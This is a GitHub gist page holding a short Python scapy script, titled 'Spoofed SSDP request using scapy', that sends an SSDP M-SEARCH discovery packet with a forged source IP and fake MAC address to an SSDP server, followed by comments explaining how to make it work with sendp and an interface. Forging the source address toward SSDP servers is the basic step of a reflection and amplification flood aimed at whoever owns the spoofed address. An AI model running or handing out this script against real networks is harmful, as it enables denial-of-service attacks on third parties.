Last active
January 13, 2023 12:52
-
-
Save jjsantanna/bedd8929d08059cc8509684040383e77 to your computer and use it in GitHub Desktop.
Spoofed SSDP request using scapy
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from scapy.all import * | |
| fake_mac="" | |
| spoofedIPsrc="" | |
| SSDPserver="" | |
| payload = "M-SEARCH * HTTP/1.1\r\n" \ | |
| "HOST:"+SSDPserver+":1900\r\n" \ | |
| "ST:upnp:rootdevice\r\n" \ | |
| "MAN: \"ssdp:discover\"\r\n" \ | |
| "MX:2\r\n\r\n" | |
| ssdpRequest = Ether(src=fake_mac, dst='ff:ff:ff:ff:ff:ff') / IP(src=spoofedIPsrc,dst=SSDPserver) / UDP(sport=1900, dport= 1900) / payload | |
| sr1(ssdpRequest) |
For some reason it does not work if you add
Ether(src=fake_mac, dst='ff:ff:ff:ff:ff:ff') /beforeIP(...
(or justEther(src=fake_mac) /)Thanks for your comment. You are right!
To overcome this, use sendp instead of sr1 and specify iface as scapy must know which interface you would like to use once you edit the Ether class
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thanks for your comment. You are right!